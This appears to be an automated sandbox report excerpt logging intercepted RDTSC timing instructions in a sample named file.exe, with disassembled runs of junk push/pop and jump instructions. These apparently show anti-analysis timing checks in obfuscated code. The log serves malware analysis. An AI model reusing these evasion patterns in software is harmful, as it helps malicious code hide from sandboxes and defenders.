Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D73F70 second address: D73F76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79303 second address: D79307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79307 second address: D79318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F12792CFFA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7875C second address: D7876C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B64Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A41 second address: D78A51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFAAh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A51 second address: D78A7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F127853B658h 0x00000008 jg 00007F127853B646h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A7A second address: D78A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A80 second address: D78A8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F127853B657h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D790A6 second address: D790AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D790AA second address: D790AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7BF58 second address: D7BF81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFACh 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F12792CFFAEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE37C second address: CFE382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE382 second address: CFE388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE388 second address: CFE38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFE38C second address: CFE3AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F12792CFFA6h 0x00000008 jmp 00007F12792CFFACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F12792CFFAEh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D84CB5 second address: D84CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B64Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jng 00007F127853B64Ah 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D84CDA second address: D84CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D84CE0 second address: D84D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 ja 00007F127853B646h 0x00000017 je 00007F127853B646h 0x0000001d jmp 00007F127853B656h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85910 second address: D85914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85A4F second address: D85A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85EB0 second address: D85EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D896BE second address: D896C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D896C4 second address: D896C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52228 second address: D5222C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5222C second address: D5223A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F12792CFFA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5223A second address: D52289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F127853B653h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F127853B651h 0x0000001a popad 0x0000001b popad 0x0000001c nop 0x0000001d cld 0x0000001e lea eax, dword ptr [ebp+12483F03h] 0x00000024 add dword ptr [ebp+12472014h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jnl 00007F127853B648h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52289 second address: D5229F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12792CFFB2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D528D4 second address: D528DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52A08 second address: D52A0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52AAC second address: D52AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52BDB second address: D52BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52BE7 second address: D52BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52DE2 second address: D52DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52DE7 second address: D52DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D534D7 second address: D534DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D534DD second address: D534E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D534E2 second address: D53515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFABh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jmp 00007F12792CFFB9h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53515 second address: D5354B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F127853B655h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D899B3 second address: D899BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F12792CFFA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D899BD second address: D899C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D899C3 second address: D899DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F12792CFFB5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D899DE second address: D899F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F127853B656h 0x00000008 jmp 00007F127853B64Ah 0x0000000d jo 00007F127853B646h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D89CBE second address: D89CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFAEh 0x00000007 jnc 00007F12792CFFAAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F12792CFFBFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D89CE4 second address: D89CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D89E1A second address: D89E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8EE38 second address: D8EE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F127853B64Ch 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8EE54 second address: D8EE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F12792CFFA6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8EE6C second address: D8EE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8EFD9 second address: D8EFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFB7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F2B1 second address: D8F2B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F56E second address: D8F57C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnl 00007F12792CFFA6h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F57C second address: D8F58D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F127853B648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F58D second address: D8F5AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F12792CFFB7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F5AE second address: D8F5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F5B2 second address: D8F5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F861 second address: D8F884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 jc 00007F127853B646h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F127853B651h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F9FA second address: D8FA00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D798 second address: D0D79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D79C second address: D0D7FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFADh 0x00000007 jo 00007F12792CFFA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F12792CFFCBh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F12792CFFB5h 0x0000001d pushad 0x0000001e jnl 00007F12792CFFA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D7FF second address: D0D804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D804 second address: D0D809 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0D809 second address: D0D80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D941DA second address: D941DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93E11 second address: D93E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B64Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93E23 second address: D93E34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F12792CFFACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93E34 second address: D93E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007F127853B672h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F127853B646h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A6ED second address: D9A753 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12792CFFD2h 0x00000008 jmp 00007F12792CFFB7h 0x0000000d jmp 00007F12792CFFB5h 0x00000012 jmp 00007F12792CFFB0h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F12792CFFA8h 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 js 00007F12792CFFA6h 0x0000002a jnc 00007F12792CFFA6h 0x00000030 jnl 00007F12792CFFA6h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A753 second address: D9A75D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F127853B646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9EF02 second address: D9EF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F12792CFFA6h 0x0000000a popad 0x0000000b ja 00007F12792CFFB1h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F12792CFFAEh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9EF2B second address: D9EF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F127853B64Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E172 second address: D9E176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E176 second address: D9E17A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E305 second address: D9E30F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F12792CFFA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E48E second address: D9E498 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E498 second address: D9E4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F12792CFFA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E4A2 second address: D9E4C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F127853B65Ah 0x0000000e jmp 00007F127853B64Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E5E6 second address: D9E5FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jno 00007F12792CFFA6h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E943 second address: D9E947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E947 second address: D9E972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F12792CFFA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E972 second address: D9E985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F127853B646h 0x0000000d jg 00007F127853B646h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA4873 second address: DA4889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F12792CFFB1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA31FA second address: DA3213 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jng 00007F127853B64Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA335E second address: DA338A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFAEh 0x00000009 jmp 00007F12792CFFB9h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3730 second address: DA3742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F127853B646h 0x0000000c ja 00007F127853B646h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3742 second address: DA376D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F12792CFFB6h 0x0000000f jmp 00007F12792CFFABh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA376D second address: DA3771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3771 second address: DA3777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3777 second address: DA3781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3781 second address: DA3787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3787 second address: DA3796 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F127853B646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52FBA second address: D52FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D52FBF second address: D53059 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F127853B648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F127853B648h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D35EBh] 0x0000002d and cx, 1D1Bh 0x00000032 mov ebx, dword ptr [ebp+12483F42h] 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F127853B648h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 movsx ecx, si 0x00000055 add eax, ebx 0x00000057 push 00000000h 0x00000059 push ebx 0x0000005a call 00007F127853B648h 0x0000005f pop ebx 0x00000060 mov dword ptr [esp+04h], ebx 0x00000064 add dword ptr [esp+04h], 0000001Dh 0x0000006c inc ebx 0x0000006d push ebx 0x0000006e ret 0x0000006f pop ebx 0x00000070 ret 0x00000071 mov ecx, dword ptr [ebp+122D1DFBh] 0x00000077 cld 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jg 00007F127853B64Ch 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3A39 second address: DA3A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFABh 0x00000009 jmp 00007F12792CFFADh 0x0000000e jmp 00007F12792CFFB7h 0x00000013 popad 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
